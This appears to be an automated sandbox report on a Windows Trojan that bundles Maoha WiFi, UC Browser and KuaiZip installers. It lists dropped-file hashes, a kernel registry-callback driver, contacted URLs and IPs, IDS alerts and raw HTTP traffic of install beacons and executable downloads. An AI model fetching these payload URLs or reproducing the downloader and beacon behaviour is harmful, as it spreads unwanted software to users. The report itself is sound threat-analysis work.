68b2a121a539371262af32004abd2b20 c:\Program Files\Maoha\MaohaAP\gzipdll.dll
f96221d6c46ce19751c43c423b7c3ba1 c:\Program Files\Maoha\MaohaAP\maohasubstat.dll
1d66e130dac29c706a1005268d98dab0 c:\Program Files\Maoha\MaohaAP\pcid.dll
b493c0cdee36755385cee0057c25175f c:\Program Files\Maoha\MaohaAP\pcidetect.dll
0a2041af48f0fbda65876fc7efdc5c9a c:\Program Files\Maoha\MaohaAP\softconfig.dll
618b8336c03c31a3f79a39d9e89983ea c:\Program Files\Maoha\MaohaAP\tips.exe
02d316a6166508f4bd5fc478562f2bc1 c:\Program Files\Maoha\MaohaAP\tipsdll.dll
0a2ec8bd4f918532798fc4ae82051862 c:\Program Files\Maoha\MaohaAP\uninstall.dll
20767cbd7240875b406b0f02c4da609a c:\Program Files\mgdisk\mgdinst.dll
4b6cc3c484f1b668eb54079d09993a67 c:\Program Files\mgdisk\mgdisk.exe
757dcebc20767cd62736914427b27e97 c:\Program Files\mgdisk\sciter32.dll
9120403115f68fc32af4a1794e39cc8e c:\Program Files\mgdisk\sqlite3.dll
ddbf6c8aa0385708294821ba21376a8e c:\Program Files\mgdisk\uninst.exe
c7d4d685a0af2a09cbc21cb474358595 c:\Program Files\mgdisk\zlib.dll
71bfd5d8c505e34b008b11e6917b2750 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\26512\UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe
5a02fcd66a1c080d2256e7917adad77c c:\Windows\System32\drivers\cryptfd.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\??\%Program Files%\Maoha\MaohaAP\MaoHaWiFiNet.sys", the Trojan controls operations on the system registry by installing a registry notifier (a kernel-mode registry callback).

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 1353007 1353216 4.32418 5788e4d83cdea7793ded7b1f06e723de
.rdata 1359872 272566 272896 3.28055 f6a7e0d24fab81d6be4e816919ec38e3
.data 1634304 88908 33792 3.63856 80692f4fb3275b9706c71ab37835f246
.rsrc 1724416 488 512 3.30399 49b537b76b67c37acf0ee3c80003a292
.reloc 1728512 69304 69632 4.53487 4580b63d126c8188eae2aa552d36155a

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://e6640.g.akamaiedge.net/js/geo2.js
hxxp://xiaobingdou.com/anzhuang.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNENCRkRDMjlFQUEzOUFDRjRGNTlBOUM0M0NEMEI0RUQ2RTcyNEY5MzREODM5QkY2MzFDOTk0QThDRENGOEU1MzE= 23.234.26.217
hxxp://xiaobingdou.com/reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNDU5QTJBRDc1MjJGRTBCMEQzMDQ1M0E3QTU2RTYyMzU3REI1NzI3MUVCN0IzQ0U2MzdFOTY4MTM5QjI3RDY4RTg0MUJGMzEzQzAzNTcwM0FBQkZBNzIxQjRBMTMxOTY3MTZEM0FEQTRDMUYyOTYwNUQxREFBMjU5MEVDRENGMDBCMTM2QjIxRjhEQkQ3OEYwQkY4RTJCRkExRDJGQzg1NTU= 23.234.26.217
hxxp://xiaobingdou.com/jihuo.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNENCM0YyN0U3MTIzM0JGODY2QUZDM0MzMkYwRjYyNzhERDBFMzIwREU5RkUxRDU1NTczMUQ4Rjg1RDA5QUNCNEFFNjBEODc2NTAzNzQzRDc5Qjg5MDJGNEUyMTNDQkI1NTM2QTRBN0YzMkI3NUFDNUNEQzEzNDRGNDMwRURGNEI2 23.234.26.217
hxxp://dns.union.uc.cn/pcbrowser/down.php?pid=4043
hxxp://software77.net/geo-ip/ 63.247.71.18
hxxp://umcdn.uc.cn.w.alikunlun.com/down/4043/UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe 80.231.126.236
hxxp://1st.dl.ourdvs.com/soft/mhwifi/MaoHaWiFiSetup_265.exe
hxxp://xiaobingdou.com/reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNDU5QTJBRDc1MjJGRTBCMEQzMDQ1M0E3QTU2RTYyMzU3MjZFNTA0M0I1NkY3MkUxRkQ2NkY2OEYyOTY1Q0E2OUI4MTg3NjU3MkU3M0VBNjNFMzY2NzhEQzg2ODI3Q0VGNEI1MTY0NTRCODA3MUEwMDY0Mzk0NDEzRDlCOTY2MUI1Nzc1MzMyOUIyMEU1Q0JDRUQwNjU2NzdBOTFENUQxQUQ3NUVBQ0E3RTM2QzdDNDk2QTNCMDhFM0M0NTUyQUEzOERCNEI2NzQxRjA1OERBRTMxMUJFRjAzNzUzNzgzMTJB 23.234.26.217
hxxp://wow.uc.cn.danuoyi.alicdn.com/biz-data/sec/channel/test/config/av_config.ini 195.27.31.253
hxxp://dns.union.uc.cn/pcbrowser/down.php?type=dll&pid=4043
hxxp://xiaobingdou.com/reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNDU5QTJBRDc1MjJGRTBCMEQzMDQ1M0E3QTU2RTYyMzU3MjZFNTA0M0I1NkY3MkUxRkQ2NkY2OEYyOTY1Q0E2OUI5MjREMEMzMjM2NzgwMDc4MzAzQzg1NjNFRTI1NTdCQkUxNzUwN0MwQTgwOTk0QjgxM0E5MTZFMTY2RDMyMjc1M0U4NEE2Mzk3MzQ1MTZERDY2N0JEQjA5NEVFOTI2Q0YzMzQ1REM0RjYzMTZDMjlBMDEzQUQ2MTg5RUM1OTQ1QUI4RTE1RUE1QTUwQzNFM0ExNzk2RTA2QjRERTQ2RTIwNzY3QjVFQzE5NEMzMDc5NjMxNzg4MTk1NDRCOTQ1MjM= 23.234.26.217
hxxp://umcdn.uc.cn.w.alikunlun.com/down/4043/UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.dll 80.231.126.236
hxxp://xiaobingdou.com/reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNDU5QTJBRDc1MjJGRTBCMEQzMDQ1M0E3QTU2RTYyMzU3MjZFNTA0M0I1NkY3MkUxRkQ2NkY2OEYyOTY1Q0E2OUIxMzQ0MjA2N0Y3QTEwMjQ0NTY5NUI3NDUyNkJGQ0QzN0FDRTc2NDQzOTFGQTFDQzYzRjdEMjlGNjlCNTdGMTcxMEM2NTI3QjIwQTJDMUI3NzlDRjA1RDk1MjdERjJFQ0E5MDNENTEyNzY2MDk4QjcxRkE5M0IxQ0M4MUZDNDU5RTFCQ0M0MDE4NEVEN0NGOEUyMUI2MTdDMjlCNjQ2Rjcx 23.234.26.217
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab 62.140.236.170
hxxp://umcdn.uc.cn/down/4043/UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.dll 80.231.126.236
hxxp://res.maoha.com/soft/mhwifi/MaoHaWiFiSetup_265.exe 203.130.56.136
hxxp://cdn3.optimizely.com/js/geo2.js 23.64.225.232
hxxp://down2.uc.cn/pcbrowser/down.php?type=dll&pid=4043 123.150.188.19
hxxp://wow.uc.cn/biz-data/sec/channel/test/config/av_config.ini 195.27.31.253
hxxp://45.32.112.142/setup.3.15.exe
hxxp://umcdn.uc.cn/down/4043/UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe 80.231.126.236
hxxp://down2.uc.cn/pcbrowser/down.php?pid=4043 123.150.188.19
unin.maohawifi.com 121.10.143.40
service.maohawifi.com
update.ss.maohawifi.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Double User-Agent (User-Agent User-Agent)
ET POLICY Abnormal User-Agent No space after colon - Likely Hostile
ET POLICY PE EXE or DLL Windows file download HTTP
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNDU5QTJBRDc1MjJGRTBCMEQzMDQ1M0E3QTU2RTYyMzU3MjZFNTA0M0I1NkY3MkUxRkQ2NkY2OEYyOTY1Q0E2OUIxMzQ0MjA2N0Y3QTEwMjQ0NTY5NUI3NDUyNkJGQ0QzN0FDRTc2NDQzOTFGQTFDQzYzRjdEMjlGNjlCNTdGMTcxMEM2NTI3QjIwQTJDMUI3NzlDRjA1RDk1MjdERjJFQ0E5MDNENTEyNzY2MDk4QjcxRkE5M0IxQ0M4MUZDNDU5RTFCQ0M0MDE4NEVEN0NGOEUyMUI2MTdDMjlCNjQ2Rjcx HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 30 May 2017 13:36:57 GMT
Connection: close
Content-Length: 0


GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86410
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Fri, 16 Sep 2016 21:16:59 GMT
If-None-Match: "8017f9a85f10d21:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/vnd.ms-cab-compressed
Last-Modified: Wed, 19 Apr 2017 22:43:31 GMT
Accept-Ranges: bytes
ETag: "80ab755e5eb9d21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 52608
Date: Tue, 30 May 2017 13:36:37 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2

GET /soft/mhwifi/MaoHaWiFiSetup_265.exe HTTP/1.0
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: res.maoha.com
Accept: */*
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sun, 28 May 2017 10:36:09 GMT
Content-Length: 5223968
Content-Type: stream
Last-Modified: Fri, 02 Dec 2016 08:06:26 GMT
Accept-Ranges: bytes
ETag: "de179ffa724cd21:2c3e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 183601
Via: 1.1 in97:4 (Cdn Cache Server V2.0), 1.1 ml121:0 (Cdn Cache Server V2.0)[0 200 0]
Connection: keep-alive

GET /jihuo.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNENCM0YyN0U3MTIzM0JGODY2QUZDM0MzMkYwRjYyNzhERDBFMzIwREU5RkUxRDU1NTczMUQ4Rjg1RDA5QUNCNEFFNjBEODc2NTAzNzQzRDc5Qjg5MDJGNEUyMTNDQkI1NTM2QTRBN0YzMkI3NUFDNUNEQzEzNDRGNDMwRURGNEI2 HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 30 May 2017 13:36:21 GMT
Connection: close
Content-Length: 0


GET /down/4043/UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.dll HTTP/1.1
Accept: */*
Connection: Keep-Alive
User-Agent: ChannelPromptDownloader
Cache-Control: no-cache
Host: umcdn.uc.cn


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/octet-stream
Content-Length: 53411216
Connection: keep-alive
Date: Thu, 04 May 2017 07:31:04 GMT
x-oss-request-id: 590AD8B8E7407D42271E5986
Accept-Ranges: bytes
ETag: "47F55C721B70A0C9F8BEA9490B90E667"
Last-Modified: Wed, 08 Mar 2017 10:50:22 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 13731573077453710924
x-oss-storage-class: Standard
Cache-Control: max-age=7776000
Content-MD5: R/VcchtwoMn4vqlJC5DmZw==
x-oss-server-time: 61
Via: cache19.l2sg1[0,200-0,H], cache32.l2sg1[1,0], cache1.es1[0,200-0,H], cache3.es1[0,0]
Age: 2268314
X-Cache: HIT TCP_MEM_HIT dirn:2:923361199
X-Swift-SaveTime: Thu, 04 May 2017 10:58:13 GMT
X-Swift-CacheTime: 2592000
Timing-Allow-Origin: *
EagleId: 50e77ecb14961513789327155e

GET /reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNDU5QTJBRDc1MjJGRTBCMEQzMDQ1M0E3QTU2RTYyMzU3MjZFNTA0M0I1NkY3MkUxRkQ2NkY2OEYyOTY1Q0E2OUI5MjREMEMzMjM2NzgwMDc4MzAzQzg1NjNFRTI1NTdCQkUxNzUwN0MwQTgwOTk0QjgxM0E5MTZFMTY2RDMyMjc1M0U4NEE2Mzk3MzQ1MTZERDY2N0JEQjA5NEVFOTI2Q0YzMzQ1REM0RjYzMTZDMjlBMDEzQUQ2MTg5RUM1OTQ1QUI4RTE1RUE1QTUwQzNFM0ExNzk2RTA2QjRERTQ2RTIwNzY3QjVFQzE5NEMzMDc5NjMxNzg4MTk1NDRCOTQ1MjM= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 30 May 2017 13:36:35 GMT
Connection: close
Content-Length: 0


GET /setup.3.15.exe HTTP/1.0
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: 45.32.112.142
Accept: */*
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Tue, 30 May 2017 13:36:18 GMT
Content-Type: application/octet-stream
Content-Length: 2467144
Last-Modified: Thu, 25 May 2017 13:30:33 GMT
Connection: keep-alive
ETag: "5926dc79-25a548"
Accept-Ranges: bytes

GET /reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNDU5QTJBRDc1MjJGRTBCMEQzMDQ1M0E3QTU2RTYyMzU3REI1NzI3MUVCN0IzQ0U2MzdFOTY4MTM5QjI3RDY4RTg0MUJGMzEzQzAzNTcwM0FBQkZBNzIxQjRBMTMxOTY3MTZEM0FEQTRDMUYyOTYwNUQxREFBMjU5MEVDRENGMDBCMTM2QjIxRjhEQkQ3OEYwQkY4RTJCRkExRDJGQzg1NTU= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 30 May 2017 13:36:20 GMT
Connection: close
Content-Length: 0


GET /pcbrowser/down.php?type=dll&pid=4043 HTTP/1.1
Accept: */*
Content-Length: 0
User-Agent: ChannelPromptDownloader
Host: down2.uc.cn
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Tue, 30 May 2017 13:36:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10
Set-Cookie: PHPSESSID=5uq0mingii9lgc5ctpns3237h4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: hXXp://umcdn.uc.cn/down/4043/UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.dll


GET /down/4043/UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe HTTP/1.0
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: umcdn.uc.cn
Accept: */*
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/octet-stream
Content-Length: 404880
Connection: keep-alive
Date: Thu, 04 May 2017 10:51:47 GMT
x-oss-request-id: 590B07C3C73AC8253E3242B4
Accept-Ranges: bytes
ETag: "71BFD5D8C505E34B008B11E6917B2750"
Last-Modified: Wed, 08 Mar 2017 10:50:20 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 17826665700317366293
x-oss-storage-class: Standard
Cache-Control: max-age=7776000
Content-MD5: cb/V2MUF40sAixHmkXsnUA==
x-oss-server-time: 75
Via: cache13.l2sg1[0,200-0,H], cache3.l2sg1[1,0], cache2.es1[0,200-0,H], cache2.es1[0,0]
Age: 2256258
X-Cache: HIT TCP_MEM_HIT dirn:5:187077021
X-Swift-SaveTime: Thu, 04 May 2017 10:58:05 GMT
X-Swift-CacheTime: 2592000
Timing-Allow-Origin: *
EagleId: 50e77eca14961513653291011e

GET /reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNDU5QTJBRDc1MjJGRTBCMEQzMDQ1M0E3QTU2RTYyMzU3MjZFNTA0M0I1NkY3MkUxRkQ2NkY2OEYyOTY1Q0E2OUI4MTg3NjU3MkU3M0VBNjNFMzY2NzhEQzg2ODI3Q0VGNEI1MTY0NTRCODA3MUEwMDY0Mzk0NDEzRDlCOTY2MUI1Nzc1MzMyOUIyMEU1Q0JDRUQwNjU2NzdBOTFENUQxQUQ3NUVBQ0E3RTM2QzdDNDk2QTNCMDhFM0M0NTUyQUEzOERCNEI2NzQxRjA1OERBRTMxMUJFRjAzNzUzNzgzMTJB HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 30 May 2017 13:36:33 GMT
Connection: close
Content-Length: 0


GET /geo-ip/ HTTP/1.1
Accept: */*
User-Agent: Agent1309581
Host: software77.net
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Tue, 30 May 2017 13:36:04 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html

GET /biz-data/sec/channel/test/config/av_config.ini HTTP/1.1
Accept: */*
Content-Length: 0
User-Agent: ChannelPromptDownloader
Host: wow.uc.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/octet-stream
Content-Length: 32
Connection: keep-alive
Date: Tue, 30 May 2017 13:04:07 GMT
x-oss-request-id: 592D6DC76FA177397CD51E5A
Accept-Ranges: bytes
ETag: "54038E4A450A3F429405CCBE0DBFCFAE"
Last-Modified: Fri, 24 Feb 2017 08:50:01 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 10919123851284209732
x-oss-storage-class: Standard
Content-MD5: VAOOSkUKP0KUBcy Db/Prg==
x-oss-server-time: 2
Via: cache26.l2hk1[0,304-0,H], cache8.l2hk1[0,0], cache1.de1[0,200-0,H], cache10.de1[0,0]
Age: 1927
X-Cache: HIT TCP_MEM_HIT dirn:1:444715889
X-Swift-SaveTime: Tue, 30 May 2017 13:18:40 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: c31b1fd214961513748805825e
[base]
anti=1
set_d=1
set_m=0

GET /pcbrowser/down.php?pid=4043 HTTP/1.0
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: down2.uc.cn
Accept: */*
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Tue, 30 May 2017 13:36:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.10
Set-Cookie: PHPSESSID=q2mf36c5t5l3ulltohvn2iaue5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: hXXp://umcdn.uc.cn/down/4043/UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe


GET /anzhuang.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNENCRkRDMjlFQUEzOUFDRjRGNTlBOUM0M0NEMEI0RUQ2RTcyNEY5MzREODM5QkY2MzFDOTk0QThDRENGOEU1MzE= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 30 May 2017 13:36:20 GMT
Connection: close
Content-Length: 1
1


GET /js/geo2.js HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: cdn3.optimizely.com


HTTP/1.1 200 OK
Server: AmazonS3
Content-Length: 290
Content-Type: application/javascript
x-amz-id-2: gGAU2mEDtFFvD7ycmQ E V25vxWoHcSj5N37VNBlmtwFFNAgc4qEruHqt1etulj0 b833Mqb9Nw=
x-amz-version-id: Y1BKPK.c9lIaZx2uYj8JMWZye_vJfrh9
ETag: "adadfc5d7afd13e353d9d52cec1c7827"
x-amz-request-id: 0B414A2AB6ACE923
Cache-Control: max-age=67794
Date: Tue, 30 May 2017 13:35:59 GMT
Connection: close
(function(){.  window['optimizely'] = window['optimizely'] || [];.  wi
ndow['optimizely'].push(['activateGeoDelayedExperiments', {. 'locat
ion':{. 'city': "KHARKIV",. 'continent': "EU",. 'countr
y': "UA",. 'region': "". },. 'ip':"194.242.96.218". }]);.}
).//.()..;..


The Trojan connects to the servers at the following location(s):

%original file name%.exe_2624:

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip2
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip2
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
HKEY_LOCAL_MACHINE\SOFTWARE\KHT
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ludashi_is1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Ludashi_is1
G:\pz_git\vendor\inc\Poco/SharedPtr.h
: this object doesn't support resynchronization
StreamTransformation: this object doesn't support random access
G:\pz_git\vendor\inc\Poco/ScopedLock.h
G:\pz_git\vendor\inc\Poco/RefCountedObject.h
%s: Couldn't find usable socket driver.
: this object does't support a special last block
: this object doesn't support multiple channels
is not a valid key length
G:\pz_git\bin\kpzip.pdb
HttpQueryInfoA
InternetOpenUrlW
WININET.dll
SHLWAPI.dll
GetProcessHeap
CreatePipe
KERNEL32.dll
USER32.dll
RegCloseKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
IPHLPAPI.DLL
WS2_32.dll
VERSION.dll
GetCPInfo
PeekNamedPipe
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyA
zcÁ
ABEDABELABETABLEABUTACHEACIDACMEACREACTAACTSADAMADDSADENAFARAFROAGEEAHEMAHOYAIDAAIDEAIDSAIRYAJARAKINALANALECALGAALIAALLYALMAALOEALSOALTOALUMALVAAMENAMESAMIDAMMOAMOKAMOSAMRAANDYANEWANNAANNEANTEANTIAQUAARABARCHAREAARGOARIDARMYARTSARTYASIAASKSATOMAUNTAURAAUTOAVERAVIDAVISAVONAVOWAWAYAWRYBABEBABYBACHBACKBADEBAILBAITBAKEBALDBALEBALIBALKBALLBALMBANDBANEBANGBANKBARBBARDBAREBARKBARNBARRBASEBASHBASKBASSBATEBATHBAWDBAWLBEADBEAKBEAMBEANBEARBEATBEAUBECKBEEFBEENBEERBEETBELABELLBELTBENDBENTBERGBERNBERTBESSBESTBETABETHBHOYBIASBIDEBIENBILEBILKBILLBINDBINGBIRDBITEBITSBLABBLATBLEDBLEWBLOBBLOCBLOTBLOWBLUEBLUMBLURBOARBOATBOCABOCKBODEBODYBOGYBOHRBOILBOLDBOLOBOLTBOMBBONABONDBONEBONGBONNBONYBOOKBOOMBOONBOOTBOREBORGBORNBOSEBOSSBOTHBOUTBOWLBOYDBRADBRAEBRAGBRANBRAYBREDBREWBRIGBRIMBROWBUCKBUDDBUFFBULBBULKBULLBUNKBUNTBUOYBURGBURLBURNBURRBURTBURYBUSHBUSSBUSTBUSYBYTECADYCAFECAGECAINCAKECALFCALLCALMCAMECANECANTCARDCARECARLCARRCARTCASECASHCASKCASTCAVECEILCELLCENTCERNCHADCHARCHATCHAWCHEFCHENCHEWCHICCHINCHOUCHOWCHUBCHUGCHUMCITECITYCLADCLAMCLANCLAWCLAYCLODCLOGCLOTCLUBCLUECOALCOATCOCACOCKCOCOCODACODECODYCOEDCOILCOINCOKECOLACOLDCOLTCOMACOMBCOMECOOKCOOLCOONCOOTCORDCORECORKCORNCOSTCOVECOWLCRABCRAGCRAMCRAYCREWCRIBCROWCRUDCUBACUBECUFFCULLCULTCUNYCURBCURDCURECURLCURTCUTSDADEDALEDAMEDANADANEDANGDANKDAREDARKDARNDARTDASHDATADATEDAVEDAVYDAWNDAYSDEADDEAFDEALDEANDEARDEBTDECKDEEDDEEMDEERDEFTDEFYDELLDENTDENYDESKDIALDICEDIEDDIETDIMEDINEDINGDINTDIREDIRTDISCDISHDISKDIVEDOCKDOESDOLEDOLLDOLTDOMEDONEDOOMDOORDORADOSEDOTEDOUGDOURDOVEDOWNDRABDRAGDRAMDRAWDREWDRUBDRUGDRUMDUALDUCKDUCTDUELDUETDUKEDULLDUMBDUNEDUNKDUSKDUSTDUTYEACHEARLEARNEASEEASTEASYEBENECHOEDDYEDENEDGEEDGYEDITEDNAEGANELANELBAELLAELSEEMILEMITEMMAENDSERICEROSEVENEVEREVILEYEDFACEFACTFADEFAILFAINFAIRFAKEFALLFAMEFANGFARMFASTFATEFAWNFEARFEATFEEDFEELFEETFELLFELTFENDFERNFESTFEUDFIEFFIGSFILEFILLFILMFINDFINEFINKFIREFIRMFISHFISKFISTFITSFIVEFLAGFLAKFLAMFLATFLAWFLEAFLEDFLEWFLITFLOCFLOGFLOWFLUBFLUEFOALFOAMFOGYFOILFOLDFOLKFONDFONTFOODFOOLFOOTFORDFOREFORKFORMFORTFOSSFOULFOURFOWL
